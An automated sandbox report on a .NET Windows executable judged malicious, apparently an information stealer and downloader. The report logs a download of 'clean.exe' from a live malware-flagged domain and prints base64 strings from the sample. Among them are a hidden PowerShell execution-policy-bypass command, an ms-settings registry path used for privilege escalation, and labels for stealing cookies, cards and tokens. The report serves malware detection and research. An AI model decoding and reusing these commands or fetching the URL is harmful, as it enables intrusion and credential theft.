Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iGxCM2I5u9.exe

Overview

General Information

Sample name:iGxCM2I5u9.exe
renamed because original name is a hash value
Original sample name:2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c.exe
Analysis ID:1569093
MD5:8c6fb38b219a123b9340465b8d2dd5f8
SHA1:35242280f551684b9e47726d5f94f1615c0dc76e
SHA256:2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c
Tags:exeuser-adrian__luca
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info

Classification

  • System is w10x64
  • iGxCM2I5u9.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\iGxCM2I5u9.exe" MD5: 8C6FB38B219A123B9340465B8D2DD5F8)
    • WerFault.exe (PID: 5684 cmdline: C:\Windows\system32\WerFault.exe -u -p 6420 -s 2096 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://orange-loris-425181.hostingersite.com/uploads/clean.exeAvira URL Cloud: Label: malware
Source: iGxCM2I5u9.exeReversingLabs: Detection: 65%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
Source: iGxCM2I5u9.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 84.32.84.122:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: iGxCM2I5u9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: mscorlib.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Drawing.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Management.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: mscorlib.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Management.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Drawing.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Core.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Configuration.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Configuration.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Xml.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Core.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: global trafficHTTP traffic detected: GET /uploads/clean.exe HTTP/1.1Host: orange-loris-425181.hostingersite.comConnection: Keep-Alive
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uploads/clean.exe HTTP/1.1Host: orange-loris-425181.hostingersite.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: orange-loris-425181.hostingersite.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 12:04:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodinglast-modified: Wed, 11 Jan 2023 12:29:40 GMTetag: W/"999-63beabb4-5b41a25ab194c3b4;gz"platform: hostingerpanel: hpanelx-turbo-charged-by: LiteSpeedServer: hcdnx-hcdn-request-id: 141d270770133aca7f524af2d72e23ad-bos-edge1
Source: iGxCM2I5u9.exe, 00000000.00000002.2314680258.000001EC7ECA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://free.cdn.hstgr.net
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://orange-loris-425181.hostingersite.com
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000D4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000D4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000A8000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orange-loris-425181.hostingersite.com
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orange-loris-425181.hostingersite.com/uploads/clean.exe
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orange-loris-425181.hostingersite.com/uploads/clean.exepV
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000D4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 84.32.84.122:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeCode function: 0_2_00007FF848F4C0C20_2_00007FF848F4C0C2
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeCode function: 0_2_00007FF848F4B3160_2_00007FF848F4B316
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6420 -s 2096
Source: iGxCM2I5u9.exe, 00000000.00000000.2021133840.000001EC7CE92000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.exe" vs iGxCM2I5u9.exe
Source: iGxCM2I5u9.exeBinary or memory string: OriginalFilenameSystem.exe" vs iGxCM2I5u9.exe
Source: iGxCM2I5u9.exe, AcohdgxumZqMtqiEyujcnGKSk.csBase64 encoded string: 'L2Mgc3RhcnQgL2IgcG93ZXJzaGVsbCDigJNFeGVjdXRpb25Qb2xpY3kgQnlwYXNzIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICci', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'QUNnYktLOG8veWpmS084b1Z5ajJLRElvUVNpQUtFQW9KQ2dzS0E4b0pTZ2tLQUFvUUNocEtKSW96aWk5S1A4byt5Z3ZLQjRvQVNnZ0FBPT0=', 'QUNnQUtBQW9BQ2lKS0Iwb0V5aTdLT1FvZUNnaktFQW9BQ2dBS0FBb0FDZ0FLQ0FvR2lqMEtING9YeWdKS0NNb1FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW80Q2p6S01Zb0ZDZ0pLQThvL3loRUtMRW81Q2lFS01Bb3BDajBLRWNvOENoZktLa29BU2dnS0hRb2Z5aEVLQUFvQUNnZ0FBPT0=', 'QUNnQUtLQW9BU2lBS0E0b0FDZ0FLQmdvL0NoL0tEc29HU2pOS01Bb1BDZzVLRjhvL3lqRUtNTW9BQ2dBS0Jnb1JDZ0lLRVFvQUNnZ0FBPT0=', 'QUNnQUtBY29nQ2pzS1BZbzdDaHJLSXNvZkNpM0tGY29nQ2lYS0Frb0p5aEFLTW9vdUNqbktORW85Q2p0S1BRbzlDaEVLRGdvQUNnZ0FBPT0=', 'QUNpNEtBQW9DQ2dKS0Jzb055aitLUDhveHlqdktPY295eWlKS0gwb0RTaVpLUDBvemlqL0tQOG9KeWdmS0Fzb0FTaEdLQUFvUkNnZ0FBPT0=', 'QUNpNEtJQW9RQ2dBS0lBb1lDZ1lLSWtvZnlqL0tQOG8veWhXS0FFb3NDai9LUDhvL3lqL0tFZ29FU2dpS01Bb0FDam5LRUFvUnlnZ0FBPT0=', 'QUNnWUtFNG9EeWdXS0JNb0VpZ1NLRG9vL3loSUtMY29neWdCS0FBb0RpZzhLSDRveVNqL0tBY29BQ2dBS0Fnb2dTZ0pLS3NvQUNnZ0FBPT0=', 'QUNnQUtLRW9BQ2dRS0VBb0FDZ0FLQUFvT1NqL0tPNG9JaWhIS0FBb3VDZ1FLUFVvdnlnTEtBQW9BQ2dBS0FBb0JpZ0FLRXdvQUNnZ0FBPT0=', 'QUNnQUtBQW9veWdBS0Fnb2hDZ0FLQUFvQUNnSUtCa29SeWhHS0JBb3VDaTRLQXNvQVNnQUtBQW9BQ2dBS0Fvb0FDaGNLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dSS01Rb0FDZ1JLSVFvUUNnQUtBQW8veWptS09RbzlDaitLQUFvQUNnQUtFQW9FQ2dCS09Bb0NpZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0Fnb0VpaWtLSDhvQ0NnUUtBQW9OQ2l0S1A4bzdTZ3VLQUFvRWlncEtQNG9aQ2dhS0FFb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQWdvRUNnQUtDUW9BQ2lJS1BZb1dDZ0FLQ1FvRkNnQ0tBRW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0Jrb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FDQUE=', 'Q1FBSkFEM1lzOXdnQUVNQWNnQmxBR1FBYVFCMEFFTUFZUUJ5QUdRQWN3QTZBQ0FB', 'Q1FBSkFEM1lGdDBnQUVJQWJ3QnZBR3NBYlFCaEFISUFhd0J6QURvQUlBQT0=', 'Q1FBSkFEM1k1dHdnQUVRQWJ3QjNBRzRBYkFCdkFHRUFaQUJ6QURvQUlBQT0=', 'Q1FBSkFEellxTjhnQUZJQVpRQnpBSFFBYndCeUFHVUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSkFEN1l5dDBnQUZjQVlRQnNBR3dBWlFCMEFITUFPZ0FnQUE9PQ==', 'Q1FCRUp3LytJQUJYQUdFQWJBQnNBR1VBZEFCekFDQUFRUUJ3QUhBQU9nQWdBQT09', 'Q1FBKzJLTGRJQUJRQUdrQVpBQm5BR2tBYmdBZ0FFRUFjQUJ3QURvQUlBQT0=', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSUp3LytJQUJVQUdVQWJBQmxBR2NBY2dCaEFHMEFJQUJ6QUdVQWN3QnpBR2tBYndCdUFITUE=', 'Q1FBQkpnLytJQUJUQUdzQWVRQndBR1VBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFkQUJ2QUdzQVpRQnVBQT09', 'Q1FBOTJLM2NJQUJUQUdrQVp3QnVBR0VBYkFBZ0FITUFaUUJ6QUhNQWFRQnZBRzRB', 'Q1FBODJLN2ZJQUJUQUhRQVpRQmhBRzBBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBODJLN2ZJQUJWQUhBQWJBQmhBSGtBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FDWkpnLytJQUJRQUhJQWJ3QmpBR1VBY3dCekFHVUFjd0E2QUNBQQ==', 'W1x3LV17MjQsMjZ9XC5bXHctXXs2fVwuW1x3LV17MjUsMTEwfXxtZmFcLlthLXpBLVowLTlfXC1dezg0fQ==', 'U29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNS4wXE91dGxvb2tcUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3Ng==', 'U29mdHdhcmVcTWljcm9
Source: classification engineClassification label: mal72.evad.winEXE@2/5@1/1
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeMutant created: NULL
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6420
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile created: C:\Users\user\AppData\Local\Temp\downloadedFile.exeJump to behavior
Source: iGxCM2I5u9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: iGxCM2I5u9.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: iGxCM2I5u9.exeReversingLabs: Detection: 65%
Source: unknownProcess created: C:\Users\user\Desktop\iGxCM2I5u9.exe "C:\Users\user\Desktop\iGxCM2I5u9.exe"
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6420 -s 2096
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: iGxCM2I5u9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: iGxCM2I5u9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: mscorlib.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Drawing.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Management.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: mscorlib.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Management.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Drawing.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Core.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Configuration.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Configuration.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Xml.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.pdb source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER9DAB.tmp.dmp.4.dr
Source: Binary string: System.Core.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source: iGxCM2I5u9.exeStatic PE information: 0x9A13B17D [Thu Nov 30 18:31:25 2051 UTC]
Source: iGxCM2I5u9.exe, YNQggCGIprkgfKSFO.csHigh entropy of concatenated method names: 'yaQsiQjOIaNVMcbsUYNIYqAma', 'jfoqIjiIQWJffAwStf', 'UfHEmpurGaIZdSGgDaSRemDM', 'josMLGwUrGx', 'aBAOrciIwfNZTtrbOQ', 'bvzDBBfvTLEmMJFcZRDm', 'UDIDbTtRPVGbY', 'fbyzMMhOwstBQOQS', 'KdXGrrzaildEq', 'LnnZBaSqadFHQKZCeBxLwxAOn'
Source: iGxCM2I5u9.exe, AcohdgxumZqMtqiEyujcnGKSk.csHigh entropy of concatenated method names: 'vAoWMpNCmxjb', 'iqybDWaoMVQZhh', 'KuSWxWkxGQMByqEkVWfAmp', 'HwJSjeXwfHarseNesyt', 'KqVcyIkvCBhBVPLaoEASjTh', 'YzMGIsmBswUQbhUbubtdaYVc', 'mpoxbJrJbDywenK', 'fJZvuzHjZYHZDS', 'djnVCyEQncHzdVfPojOvPwhYn', 'EYDBSGIEVMrRHQbslSnz'
Source: iGxCM2I5u9.exe, eUZcfxaGLVMSHSrJHtKYI.csHigh entropy of concatenated method names: 'SBohrrBlujVWUCRUM', 'PsypwigwOSQgzEKjUU', 'XuiosVQmdMlQIDiMyYdFFAuc', 'UOjQLkhwaoghDGTfvCkd', 'IcRsMLrPoW', 'GEXHgWRcDUhOBfuSJZKyKyhMl', 'YzZqgmShbyiMzZk', 'ahaNQNSshpeY', 'HXLVPxSCMnvwTEvkxakNCX', 'lXALggIrHu'
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
